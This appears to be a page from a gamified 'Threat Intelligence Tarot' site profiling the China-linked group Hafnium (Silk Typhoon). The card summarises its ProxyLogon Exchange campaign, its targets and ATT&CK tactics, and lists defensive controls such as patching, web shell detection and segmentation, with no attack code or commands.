Threat Intelligence Tarot
swords · 3
China (MSS-linked)
G0125★★★★★
risk 5/5
✦ The Hidden Key ✦
Hafnium
HAFNIUM · Silk Typhoon
US Exchange serversLaw firmsResearch universitiesDefense contractorsNGOs
Active since ~2021 (publicly disclosed) · Infectious disease research, Defense industrial base access, Legal and policy intelligence
Microsoft disclosed four zero-days on a Tuesday. By Wednesday, hundreds of thousands of Exchange servers worldwide had web shells installed. The Hidden Key was already inside before defenders could turn the lock.
Tactics & Techniques
RCN
RDV
INI
EXC
PRS
PRV
EVA
CRD
DSC
LAT
COL
C2
EXF
IMP
Notable Operations
- ◆ProxyLogon - Microsoft Exchange 0-day exploitation (March 2021)
- ◆250,000+ Exchange servers compromised in days
- ◆Mass web shell deployment before patches could be applied
- ◆US Treasury Department breach (2024, SilkTyphoon)
Defenses
- ▸Emergency patching SLA for Exchange and internet-facing systemsCIS Control 7 ↗
- ▸Web shell detection and file integrity monitoring on IISNIST CSF: DE.CM ↗
- ▸Exchange server hardening and minimal internet exposureMicrosoft Exchange Security Guide
- ▸Network segmentation isolating Exchange from internal systemsCIS Control 12 ↗
Reversed: Their Weakness
The mass exploitation of ProxyLogon was so broad and so fast that it attracted every other APT group to pile on the same vulnerabilities - the noise of opportunistic follow-on exploitation helped incident responders identify Hafnium's more deliberate initial access.
Share this adversary profile
swipe to browse
Related Adversaries
Data sourced from MITRE ATT&CK. For educational purposes.